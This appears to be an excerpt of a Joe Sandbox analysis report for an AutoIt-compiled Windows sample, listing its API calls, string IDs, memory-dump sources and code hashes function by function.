                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: 0a77dc470de8e72da8623d0662b7a6370ae527aa8133b95ebf84c37e18ce7eb0
                                                • Instruction ID: fc1ee1a7570cdf2c3afe07a9832767394691667ab1435223b2ea0b04ecb62746
                                                • Opcode Fuzzy Hash: 0a77dc470de8e72da8623d0662b7a6370ae527aa8133b95ebf84c37e18ce7eb0
                                                • Instruction Fuzzy Hash: D441E972A0024ABBDF10ABA4DD42FEF77B9DF89714F000069F605EB181D7B19A05CB61
                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B0A85A
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B0A86F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 8d3e255acc93b64e82003631751e4d3bff663a9172c9bd3d141b9d39291a8c14
                                                • Instruction ID: e45b5c036a3578507abc31958f8dbe78013db92124697aae18ad9df4be118fbc
                                                • Opcode Fuzzy Hash: 8d3e255acc93b64e82003631751e4d3bff663a9172c9bd3d141b9d39291a8c14
                                                • Instruction Fuzzy Hash: 7D41E775E013099FDB54CF68D881BDABBF9FB08300F1444AAE905AB391D770A942CFA1
                                                APIs
                                                • _memset.LIBCMT ref: 00AF5190
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00AF51C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: 993e851e1f27021499e7c2706aa30466efae442dfd7b00a1b56fc791f7e10d22
                                                • Instruction ID: a388219cb1ae2157e228c68c0b33ab2cf8a6dcbaa1691f84bf5eab5c745bedbb
                                                • Opcode Fuzzy Hash: 993e851e1f27021499e7c2706aa30466efae442dfd7b00a1b56fc791f7e10d22
                                                • Instruction Fuzzy Hash: 3B311771C00119ABDF11AFE4CD85EEEBFB9FF19750F000119F915A6166EB31AA06CBA0
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 00B0980E
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B0984A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: f52926fb070f08fdbd38a7011df20574eba7bf3ebc75c6dbe11a924bdce0361a
                                                • Instruction ID: 854ce2d999e34e12d04ace4b9a4cec08f3eb1524399498919c8a35aac3cd1015
                                                • Opcode Fuzzy Hash: f52926fb070f08fdbd38a7011df20574eba7bf3ebc75c6dbe11a924bdce0361a
                                                • Instruction Fuzzy Hash: 20316D71110604AAEB109F68CC80BFB77ADFF59760F008619F9A9C7191DB31AC81C760
                                                APIs
                                                • _memset.LIBCMT ref: 00AE51C6
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE5201
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 6bb020213fbc47355900baa0efff8f46836ffd4b768bf44f1edaa8253893f0d0
                                                • Instruction ID: 4b51a2206188979bc058748b5d4ed9ca1b75933a1de5cca5067aee1c98c4b129
                                                • Opcode Fuzzy Hash: 6bb020213fbc47355900baa0efff8f46836ffd4b768bf44f1edaa8253893f0d0
                                                • Instruction Fuzzy Hash: C431F531E003459BEB25DFAAE845BEEBBF8AF45358F144019EA81A61A0D7709944CB11
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __snwprintf
                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                • API String ID: 2391506597-2584243854
                                                • Opcode ID: a004b0d4d9a7329fd28a84b51882bdf6d81b45cb1a3c034004733ce56288aa10
                                                • Instruction ID: c0247bf6ba89123ba05c908fc72bf2c09d05a517a710bad90e020cbf8fe23fa5
                                                • Opcode Fuzzy Hash: a004b0d4d9a7329fd28a84b51882bdf6d81b45cb1a3c034004733ce56288aa10
                                                • Instruction Fuzzy Hash: 48216F71A00218AFCF14EFA4C982EFE77B5AF45740F0404A9F505EB292DB70EA45CBA5
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B0945C
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B09467
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: c889bfdaf11f9d7d344bbd6696bd365bd8708a88b22c6def4aa43a01305010f3
                                                • Instruction ID: 534fb7518ad06a88b5b2ea0e25562bb8fae316a9511453f76752edc386d26e3c
                                                • Opcode Fuzzy Hash: c889bfdaf11f9d7d344bbd6696bd365bd8708a88b22c6def4aa43a01305010f3
                                                • Instruction Fuzzy Hash: D81182B13102086FEF219E54DC81EBF3BAEEB883A4F104165F919972E1D6759C528B60
                                                APIs
                                                  • Part of subcall function 00ABD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ABD1BA
                                                  • Part of subcall function 00ABD17C: GetStockObject.GDI32(00000011), ref: 00ABD1CE
                                                  • Part of subcall function 00ABD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ABD1D8
                                                • GetWindowRect.USER32(00000000,?), ref: 00B09968
                                                • GetSysColor.USER32(00000012), ref: 00B09982
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: 31228fca40e60114b8b6b7b11888562ff4ab05974aef6aac2b8f83fd42f62415
                                                • Instruction ID: 431c79e209e6a0b98c3d47c3ee2ae6f1a8052e12c08d2376d1c9fc8bb378e2c5
                                                • Opcode Fuzzy Hash: 31228fca40e60114b8b6b7b11888562ff4ab05974aef6aac2b8f83fd42f62415
                                                • Instruction Fuzzy Hash: 65116A72510209AFDB14DFB8CC45AEA7BE8FB08304F000A58F955D3291E774E811DB60
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 00B09699
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B096A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 7f197ca0f4dc4a814ccdbb9cb116f0735aacd66552ed1d2a72ba92363a99f926
                                                • Instruction ID: 4c37fcd62ddd730c058e193a33595b8797da6582ad7fbddb32c54619d4446095
                                                • Opcode Fuzzy Hash: 7f197ca0f4dc4a814ccdbb9cb116f0735aacd66552ed1d2a72ba92363a99f926
                                                • Instruction Fuzzy Hash: 2A118C71100208ABEB215FA8DC80EEB3BAEEB053B8F604754F965931E1C776DC51D760
                                                APIs
                                                • _memset.LIBCMT ref: 00AE52D5
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AE52F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: e9b533c3a190e4a2abc98ba647e7bdd4f0c62dafe419b602971473248dc8aeae
                                                • Instruction ID: d0f56d915da6aa65e0d4204f909e7582a261cc120a62e23c85aec860dee5f32d
                                                • Opcode Fuzzy Hash: e9b533c3a190e4a2abc98ba647e7bdd4f0c62dafe419b602971473248dc8aeae
                                                • Instruction Fuzzy Hash: FC11E672D01655ABDB20DBB9E924BDD77F8AB05758F180015E901EB190D7B0ED04DB90
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AF4DF5
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AF4E1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: 9bb549bbb476b3ee59f7015e160c17c52e2b1b052e6e37aaa6d1bfe4bf6b0c7a
                                                • Instruction ID: b23543c07bfe4481fe02b3b8bd8c84e93b770a534ade53f2fff7d738388787eb
                                                • Opcode Fuzzy Hash: 9bb549bbb476b3ee59f7015e160c17c52e2b1b052e6e37aaa6d1bfe4bf6b0c7a
                                                • Instruction Fuzzy Hash: 9311A070501229BBDB258F91C888FFBFAA8FF0A765F10822AF60556140D7705985C6E0
                                                APIs
                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00AFA84E
                                                • htons.WSOCK32(00000000,?,00000000), ref: 00AFA88B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: htonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 3832099526-2422070025
                                                • Opcode ID: 5ba510bb55d9564f17de02cce14bcbd46e83abf6321ba310631fdf7e90bf5dba
                                                • Instruction ID: 098d7261802ee0884755bcf3e3622fdd0d97a93c543223bf95be80066e53de63
                                                • Opcode Fuzzy Hash: 5ba510bb55d9564f17de02cce14bcbd46e83abf6321ba310631fdf7e90bf5dba
                                                • Instruction Fuzzy Hash: C101D6B5200309ABCB219FA4C886FEDB374EF55760F108466F61A973D1D7B1E806C792
                                                APIs
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ADB7EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 3850602802-1403004172
                                                • Opcode ID: 76b4591d18e4d882868e90485d5f03aabfb9cd368ac7712791fdf525bd79c2f8
                                                • Instruction ID: 503d8bd483a322e5eff4fb1640022bcff4bf17476365170420057d6235c5ba02
                                                • Opcode Fuzzy Hash: 76b4591d18e4d882868e90485d5f03aabfb9cd368ac7712791fdf525bd79c2f8
                                                • Instruction Fuzzy Hash: BF012471611114EBDB04EBA4CD42AFE33B9BF06320B04061EF462633D2EB745808C7A0
                                                APIs
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ADB6EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 3850602802-1403004172
                                                • Opcode ID: 8e7ed5d358ba96e3e732301bbc583e70e8a065f5d54b9cebe578692060703911
                                                • Instruction ID: ec64412d44c8c2229fde8358ba7149ad0c52a2302c295a2e9c6a99d1b9ee438c
                                                • Opcode Fuzzy Hash: 8e7ed5d358ba96e3e732301bbc583e70e8a065f5d54b9cebe578692060703911
                                                • Instruction Fuzzy Hash: 7F01A271A41004EBDB14EBA4CE52BFE73B89F1A340F10001AB403B33D1EB649E1887B5
                                                APIs
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ADB76C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 3850602802-1403004172
                                                • Opcode ID: 481c2f555bd41bb879412af820f30d8cd3aee6ade4b3bf235860759e78210b20
                                                • Instruction ID: 55b50404552f874fe7667ae6d10f7fe1ca083948e3ca2aadef9a0a2cac18918a
                                                • Opcode Fuzzy Hash: 481c2f555bd41bb879412af820f30d8cd3aee6ade4b3bf235860759e78210b20
                                                • Instruction Fuzzy Hash: A101D171A42104EBEB10EBA4DA02FFE73AC9B16340F10001AB802B33D2DB649E0987B5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                • Opcode ID: fed1ae453ea93a9d3f14b390f45eea36add04fc50004e64090817071a3e0cc73
                                                • Instruction ID: b3f6d6bf5bde92fa4153bc7bb33e5822bbc7c543eb0175f1241053e34a95bed1
                                                • Opcode Fuzzy Hash: fed1ae453ea93a9d3f14b390f45eea36add04fc50004e64090817071a3e0cc73
                                                • Instruction Fuzzy Hash: A6E0D87760432827D720EBA5DC0AF8BFBECEB55B60F01005AF915D3181DA74E60587D4
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ADA63F
                                                  • Part of subcall function 00AC13F1: _doexit.LIBCMT ref: 00AC13FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: 0b96bdb8b2ba2186e303619dc5cf47d276191c169424c6fd4a5d32481285a071
                                                • Instruction ID: b5fd702e2009ea2fe9be7194888fec00484a1b268aee0958dbb1c831e6b37315
                                                • Opcode Fuzzy Hash: 0b96bdb8b2ba2186e303619dc5cf47d276191c169424c6fd4a5d32481285a071
                                                • Instruction Fuzzy Hash: 4BD02B313C071833C22037A83D17FC4758C8B16B51F1800A6BF0C9A2D35DE2C58001E9
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00B1ACC0
                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B1AEBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: DirectoryFreeLibrarySystem
                                                • String ID: WIN_XPe
                                                • API String ID: 510247158-3257408948
                                                • Opcode ID: 68fdf1973cf334a45be6f72943e0a766a4c24a2ac291650d73a600c7462fdad4
                                                • Instruction ID: 829993eaa73243ab9daef12d40f16e48f41178b67917f273302df00cef3b156a
                                                • Opcode Fuzzy Hash: 68fdf1973cf334a45be6f72943e0a766a4c24a2ac291650d73a600c7462fdad4
                                                • Instruction Fuzzy Hash: 93E0ED70C05549DFDB11DBA5DD849ECB7F8EB48301F5480C5E112B2564DB706A85DF62
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B086A2
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B086B5
                                                  • Part of subcall function 00AE7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AE7AD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 7ad8dfd541ab95a5622e1800da9bc563b812d5d20ee3af648a1f7bed94db5861
                                                • Instruction ID: ae80af761deb1c1474d43f930c44ef5eeabf2f6c2683fa2825fdc70c35df7f60
                                                • Opcode Fuzzy Hash: 7ad8dfd541ab95a5622e1800da9bc563b812d5d20ee3af648a1f7bed94db5861
